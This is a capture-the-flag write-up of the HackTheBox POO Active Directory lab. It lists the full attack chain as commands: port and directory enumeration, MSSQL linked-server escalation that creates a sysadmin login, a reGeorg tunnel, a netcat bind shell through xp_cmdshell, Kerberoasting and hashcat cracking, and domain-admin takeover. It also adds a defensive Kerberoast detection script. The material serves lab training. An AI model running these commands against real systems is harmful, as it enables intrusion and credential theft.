In this article we will walk through not just a single machine, but an entire mini-lab from the site
As stated in the description, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the accessible host, escalate privileges, and ultimately compromise the whole domain while collecting 5 flags.
The lab is reached over VPN. It is recommended not to connect from a work computer or from a host that holds data that matters to you, since you end up on a private network with people who know a thing or two about information security :)
Organizational information
So that you can keep up with new articles, software and other information, I have created
All information is provided for educational purposes only. The author of this document takes no responsibility for any damage caused to anyone by using the knowledge and methods obtained from studying this document.
Intro
This endgame consists of two machines and has 5 flags.
A description and the address of the accessible host are also given.
Let's start!
Recon flag
This machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
First of all, we scan for open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detailed information about the services running on these ports, let's run an nmap scan with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. Along the way we learn the real DNS names of the domain and the computer. On the web server we are greeted by the IIS home page.
Let's enumerate directories. I use gobuster for this. In the parameters we specify 128 threads (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
This gives us HTTP authentication on the /admin directory, as well as an accessible desktop service file, .DS_Store. .DS_Store is a file that stores custom attributes of a folder, such as the list of files, icon positions and the chosen background image. Such files can end up in web server directories when web developers copy folders over. From it we can recover information about the contents of the directory. For this you can use
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory contents. The most interesting item here is the /dev directory, in which we can see two branches, files and db. We can also learn the first 6 characters of file and directory names if the service is vulnerable to IIS ShortName disclosure. You can check for this vulnerability using
And we find a text file whose name starts with "poo_co". Not knowing what to do next, I simply selected all words starting with "co" from the wordlist.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And we enumerate them using wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find a match! We open this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
We submit the flag and advance by 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
We find nothing interesting in this database, so let's open a SQL Editor and check which users exist.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at the linked servers; I have written about this technique in detail
SELECT * FROM master..sysservers;
Here we find another SQL Server. Let's try to execute queries on this server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
And we can also chain queries: a query through the first linked server can itself go through another linked server.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
The point is that when we query a linked server, the query is executed in the context of the remote login the link is mapped to, which may be a different user! Let's see in which user's context we are running on the linked server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Now let's see in which context a query coming from the linked server back to our own server is executed!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
So it is the dbo context, which should have full privileges. Let's check the privileges in the case of a query that comes back through the linked server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have full privileges! Let's create our own admin login in this way. But such statements are not allowed through openquery, so let's do it via EXECUTE ... AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
And now we connect with the new user's credentials and look at the flag database.
We submit this flag and move on.
BackTrack flag
Let's get a shell through MSSQL; I use mssqlclient from the impacket package.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to obtain passwords, and the first thing we have encountered is the website. So we need the web server config (we cannot get a full shell out yet; clearly a firewall is in the way).
But access is denied. Although we can read files through MSSQL, we first need to know which scripting languages are configured. And in the MSSQL directory we find that Python is present.
After that, reading web.config is no problem.
EXEC sp_execute_external_script
    @language = N'Python',
    @script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())';
With the credentials we found, go to /admin and take the flag.
Fotohold flag
In fact, the firewall causes some difficulties, but looking at the network configuration, we find that IPv6 is also in use!
Let's add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but over IPv6.
And the WinRM service is reachable over IPv6. Let's connect with the credentials we found.
There is a flag on the desktop; we submit it too.
P00ned flag
After performing reconnaissance on the accessible host
setspn.exe -T intranet.poo -Q */*
Let's run this command from MSSQL.
With this query we obtain SPNs for the users p00_hr and p00_adm, which means they are exposed to attacks such as Kerberoasting. In short, we can obtain their password hashes.
First you need a stable shell as the MSSQL user. But since we are restricted, we can communicate with the host only through ports 80 and 1433. It is possible, however, to tunnel traffic through port 80! For this we will use
But when we try to access it, we get a 404 error, which means *.aspx files are not executed. To have files with this extension executed, install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we request tunnel.aspx, we get a response saying everything is ready.
Let's start the client part of the application, which will tunnel the traffic. We will send all traffic through local port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to route the traffic of any application through our tunnel. Let's add this proxy to the /etc/proxychains.conf configuration file.
Now let's upload the program to the server
Now we start the listener from MSSQL.
EXEC xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321';
And we connect from our side.
proxychains rlwrap nc poo.htb 4321
And let's get the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Next you need to crack the hashes. Since the rockyou wordlist does not contain these passwords, I used all the password wordlists shipped with SecLists. For cracking we use hashcat.
hashcat -a 0 -m 13100 kerb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we recover both passwords, the first from the dutch_passwordlist.txt wordlist and the second from Keyboard-Combinations.txt.
So now we have three users; let's go for the domain controller. First we find its address.
Great, we find the IP address of the domain controller. Let's list all users of the domain and see which of them are administrators. To do this we download the PowerView.ps1 script. Then we connect using evil-winrm, specifying the directory containing the scripts in the -s parameter. After that we simply load the PowerView script.
Now we have access to all of its functions. The user p00_adm looks like a privileged user, so we will work in his context. Let's create a PSCredential object for this user.
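From the defender's side, the Kerberoasting step above leaves a trace: event 4769 (service ticket requested) with an RC4 ticket for a user account's SPN, typically several of them from one client in a short window. The following is an added example, not part of the original write-up, that runs that detection over a constructed batch of 4769 records (the field names are simplified from the real TargetUserName, IpAddress, ServiceName, TicketEncryptionType and Status fields; the requester, client address and timestamps are made up):

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of exported 4769 records (not real lab telemetry).
# "enc" is TicketEncryptionType: 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_4769 = [
    {"time": "2020-06-01T10:00:01", "account": "dbuser@INTRANET.POO",
     "client": "::ffff:10.10.14.7", "service": "p00_hr", "enc": "0x17", "status": "0x0"},
    {"time": "2020-06-01T10:00:02", "account": "dbuser@INTRANET.POO",
     "client": "::ffff:10.10.14.7", "service": "p00_adm", "enc": "0x17", "status": "0x0"},
    # Benign: a workstation asking for a machine-account service ticket with AES.
    {"time": "2020-06-01T10:00:05", "account": "jdoe@INTRANET.POO",
     "client": "::ffff:10.13.38.20", "service": "DC$", "enc": "0x12", "status": "0x0"},
    # Benign: a single AES ticket to a user SPN (normal application use).
    {"time": "2020-06-01T10:03:00", "account": "jdoe@INTRANET.POO",
     "client": "::ffff:10.13.38.20", "service": "p00_hr", "enc": "0x12", "status": "0x0"},
]

RC4_HMAC = "0x17"


def is_roastable_request(ev):
    """Successful RC4 service ticket for a user (non-machine, non-krbtgt) SPN.
    These are the tickets whose hash can be cracked offline."""
    svc = ev["service"]
    return (ev["enc"] == RC4_HMAC and ev["status"] == "0x0"
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=2):
    """Group roastable requests by (requesting account, client address) and
    report requesters that hit >= min_services distinct user SPNs inside window.
    Returns {(account, client): sorted list of service accounts requested}."""
    by_req = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_req[(ev["account"], ev["client"])].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))
    hits = {}
    for key, reqs in by_req.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            svcs = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(svcs) >= min_services:
                hits[key] = sorted(svcs)
                break
    return hits


if __name__ == "__main__":
    for (account, client), svcs in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible Kerberoast from {account} at {client}: {', '.join(svcs)}")
```

Tuning the window and threshold is environment specific; accounts that still need RC4 (legacy services) are the usual source of false positives and are better handled by moving those SPNs to AES and long random passwords.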
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now every PowerShell command in which we pass $Creds will be executed as p00_adm. Let's display the list of users together with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so our user is indeed privileged. Let's see which groups he belongs to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Finally, we confirm that the user is a domain administrator. This gives him the right to log in to the domain controller remotely. Let's try to log in over WinRM through our tunnel. I was confused by the error that reGeorg produced when used with evil-winrm.
So let's use another, simpler tool,
We try to connect, and we are on the system.
But there is no flag. So we look at the users and check their desktops.
We find the flag on the desktop of mr3ks, and the lab is 100% complete.
That's all. As feedback, please comment on whether you learned anything new from this article and whether it was useful to you.
You can join us at
Source: www.hab.com